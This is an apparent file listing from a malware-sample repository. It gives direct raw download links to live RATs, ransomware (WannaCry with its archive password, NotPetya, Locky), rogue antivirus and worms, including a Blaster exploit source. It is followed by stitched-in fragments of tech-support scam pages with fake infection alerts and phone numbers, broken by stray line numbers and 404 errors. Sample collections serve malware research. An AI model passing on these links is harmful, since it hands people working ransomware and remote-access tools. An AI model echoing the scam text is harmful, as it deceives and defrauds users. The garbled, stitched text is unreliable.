-------------------------------------------------------------------------------- /ラット/Adwind.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/Adwind.exe -------------------------------------------------------------------------------- /ラット/Blackkomet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/Blackkomet.exe -------------------------------------------------------------------------------- /ラット/CobaltStrike.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/CobaltStrike.doc -------------------------------------------------------------------------------- /ラット/CrimsonRAT.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/CrimsonRAT.exe -------------------------------------------------------------------------------- /ラット/NJRat.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/NJRat.exe -------------------------------------------------------------------------------- /ラット/NetWire.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/NetWire.doc -------------------------------------------------------------------------------- /ラット/NetWire.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/NetWire.exe -------------------------------------------------------------------------------- /ラット/Remcos.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/Remcos.exe -------------------------------------------------------------------------------- /ラット/RevengeRAT.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/RevengeRAT.exe -------------------------------------------------------------------------------- /ラット/VanToM-Rat.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/VanToM-Rat.bat -------------------------------------------------------------------------------- /ランサムウェア/$uckyLocker.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/$uckyLocker.exe -------------------------------------------------------------------------------- /ランサムウェア/7ev3n.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/7ev3n.exe -------------------------------------------------------------------------------- /ランサムウェア/86e0eac8c5ce70c4b839ef18af5231b5f92e292b81e440193cdbdc7ed108049f.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/86e0eac8c5ce70c4b839ef18af5231b5f92e292b81e440193cdbdc7ed108049f.exe -------------------------------------------------------------------------------- /ランサムウェア/Automatic_converter_rff_to_mp4.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Automatic_converter_rff_to_mp4.exe -------------------------------------------------------------------------------- /ランサムウェア/BadRabbit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/BadRabbit.exe -------------------------------------------------------------------------------- /ランサムウェア/Birele.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Birele.exe -------------------------------------------------------------------------------- /ランサムウェア/Cerber5.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Cerber5.exe -------------------------------------------------------------------------------- /ランサムウェア/DeriaLock.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/DeriaLock.exe -------------------------------------------------------------------------------- /ランサムウェア/Dharma.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Dharma.exe -------------------------------------------------------------------------------- /ランサムウェア/Fantom.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Fantom.exe -------------------------------------------------------------------------------- /ランサムウェア/GandCrab.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/GandCrab.exe -------------------------------------------------------------------------------- /ランサムウェア/GoldenEye/GoldenEye.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/GoldenEye/GoldenEye.exe -------------------------------------------------------------------------------- /ランサムウェア/InfinityCrypt.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/InfinityCrypt.exe -------------------------------------------------------------------------------- /ランサムウェア/JigsawRansomware.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/JigsawRansomware.exe -------------------------------------------------------------------------------- /ランサムウェア/Krotten.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Krotten.exe -------------------------------------------------------------------------------- /ランサムウェア/Locky.AZ.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Locky.AZ.exe -------------------------------------------------------------------------------- /ランサムウェア/Monster Ransomware (second new version).zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Monster Ransomware (second new version).zip -------------------------------------------------------------------------------- /ランサムウェア/Monster Ransomware.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Monster Ransomware.zip -------------------------------------------------------------------------------- /ランサムウェア/NoMoreRansom.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/NoMoreRansom.exe -------------------------------------------------------------------------------- /ランサムウェア/NotPetya.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/NotPetya.exe -------------------------------------------------------------------------------- /ランサムウェア/Petya.A.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Petya.A.exe -------------------------------------------------------------------------------- /ランサムウェア/PolyRansom.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/PolyRansom.exe -------------------------------------------------------------------------------- /ランサムウェア/PowerPoint.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/PowerPoint.exe -------------------------------------------------------------------------------- /ランサムウェア/Ransomware.Locky.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Ransomware.Locky.zip -------------------------------------------------------------------------------- /ランサムウェア/Ransomware.Satana.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Ransomware.Satana.zip -------------------------------------------------------------------------------- /ランサムウェア/Ransomware.Wannacry_Plus.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Ransomware.Wannacry_Plus.zip -------------------------------------------------------------------------------- /ランサムウェア/RedEye.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/RedEye.exe -------------------------------------------------------------------------------- /ランサムウェア/Rensenware.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Rensenware.exe -------------------------------------------------------------------------------- /ランサムウェア/SporaRansomware.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/SporaRansomware.exe -------------------------------------------------------------------------------- /ランサムウェア/UIWIX.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/UIWIX.exe -------------------------------------------------------------------------------- /ランサムウェア/ViraLock.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/ViraLock.exe -------------------------------------------------------------------------------- /ランサムウェア/WannaCry.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCry.exe -------------------------------------------------------------------------------- /ランサムウェア/WannaCry/WannaCry.txt: -------------------------------------------------------------------------------- 1 | WNcry@2ol7 -------------------------------------------------------------------------------- /ランサムウェア/WannaCry/WannaCrypt0r.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCry/WannaCrypt0r.exe -------------------------------------------------------------------------------- /ランサムウェア/WannaCry/WannaCrypt0r.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCry/WannaCrypt0r.zip -------------------------------------------------------------------------------- /ランサムウェア/WannaCry/c.wnry: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCry/c.wnry -------------------------------------------------------------------------------- /ランサムウェア/WannaCry/s.wnry: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCry/s.wnry -------------------------------------------------------------------------------- /ランサムウェア/WannaCry/taskdl.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCry/taskdl.exe -------------------------------------------------------------------------------- /ランサムウェア/WannaCry/taskse.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCry/taskse.exe -------------------------------------------------------------------------------- /ランサムウェア/WannaCry/u.wnry: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCry/u.wnry -------------------------------------------------------------------------------- /ランサムウェア/WannaCrypt0r.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCrypt0r.exe -------------------------------------------------------------------------------- /ランサムウェア/WinlockerVB6Blacksod.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WinlockerVB6Blacksod.exe -------------------------------------------------------------------------------- /ランサムウェア/Xyeta.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Xyeta.exe -------------------------------------------------------------------------------- /ランサムウェア/anabelle Ransomware.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/anabelle Ransomware.exe -------------------------------------------------------------------------------- /ランサムウェア/satan.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/satan.exe -------------------------------------------------------------------------------- /ローグ/AdwereCleaner.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ローグ/AdwereCleaner.exe -------------------------------------------------------------------------------- /ローグ/SpySheriff.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ローグ/SpySheriff.exe -------------------------------------------------------------------------------- /ワーム/Blaster/607B60AD512C50B7D71DCCC057E85F1C: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Blaster/607B60AD512C50B7D71DCCC057E85F1C -------------------------------------------------------------------------------- /ワーム/Blaster/8676210e6246948201aa014db471de90: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Blaster/8676210e6246948201aa014db471de90 -------------------------------------------------------------------------------- /ワーム/Blaster/8a17f336f86e81f04d8e66fa23f9b36a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Blaster/8a17f336f86e81f04d8e66fa23f9b36a -------------------------------------------------------------------------------- /ワーム/Blaster/DComExploit.exe.vir: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Blaster/DComExploit.exe.vir -------------------------------------------------------------------------------- /ワーム/Blaster/SANS_ Malware FAQ_ What is W32_Blaster worm_.mht: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Blaster/SANS_ Malware FAQ_ What is W32_Blaster worm_.mht -------------------------------------------------------------------------------- /ワーム/Blaster/dcom.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Blaster/dcom.c -------------------------------------------------------------------------------- /ワーム/Bumerang.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Bumerang.exe -------------------------------------------------------------------------------- /ワーム/HeadTail.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/HeadTail.vbs -------------------------------------------------------------------------------- /ワーム/Heap41A.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Heap41A.exe -------------------------------------------------------------------------------- /ワーム/NadIote/Nadlote.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/NadIote/Nadlote.exe -------------------------------------------------------------------------------- /ワーム/Vobfus/Vobus.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Vobfus/Vobus.exe --------------------------------------------------------------------------------
Your computer with the IP address 182.44.57.91 has been infected by the Virus RDN/YahLover.worm!055BCCAC9FEC -- Because System Activation KEY has expired & Your information (for example, passwords, messages, and credit cards) have been stolen. Call the Technical Support number +1-800-385-4507 to protect your files and identity from further damage.
123 | 124 | 125 | 126 | 127 | Automatically report details of possible security incidents to Google. Privacy policy 128 |
Your computer with the IP address 182.54.97.91 has been infected by the Virus RDN/YahLover.worm!055BCCAC9FEC -- Because System Activation KEY has expired & Your information (for example, passwords, messages, and credit cards) have been stolen. Call the Technical Support number +1-800-385-4507 to protect your files and identity from further damage.
122 | 123 | 124 | 125 | 126 | Automatically report details of possible security incidents to Google. Privacy policy 127 |
** YOUR COMPUTER WAS LOCKED ** 71 | Error # DT00X2. 72 | 73 | Call Microsoft Technical Support at: +1-844-589-2165 74 | Do Not Ignore This Important Warning 75 | If you close this page without resolving issue, access to your computer will be disabled to prevent further damage to our network. 76 | Your computer has alerted us that it was infected with virus and spyware. The following data is at risk: 77 | 78 | 1. Facebook Login 79 | 2. Credit Card Information 80 | 3. Email Credentials 81 | 4. Browsing History and Data 82 | 83 | You must contact us immediately so our engineers can guide you through the recovery process by phone. Please call us within the next 5 minutes to prevent complete loss of your computer. 84 | Contact Microsoft Engineer: +1-844-589-2165 (Toll-Free)
96 | Windows Has Detected a Malicious Virus On Your System 97 |
Do Not Shutdown Or Restart Your Computer
Contact Our Certified Windows Technicians For Immediate Assistance
Microsoft Error: Unknown System Failure!
Call tech support...
95 | Windows Has Detected a Malicious Virus On Your System 96 |
94 | Windows Has Detected a Malicious Virus On Your System 95 |
The requested URL /Index/chrome/chrome-assests/a.htm was not found on this server.
Additionally, a 404 Not Found 8 | error was encountered while trying to use an ErrorDocument to handle the request.
The requested URL /Index/chrome/chrome-assests/ie10-viewport-bug-workaround.css was not found on this server.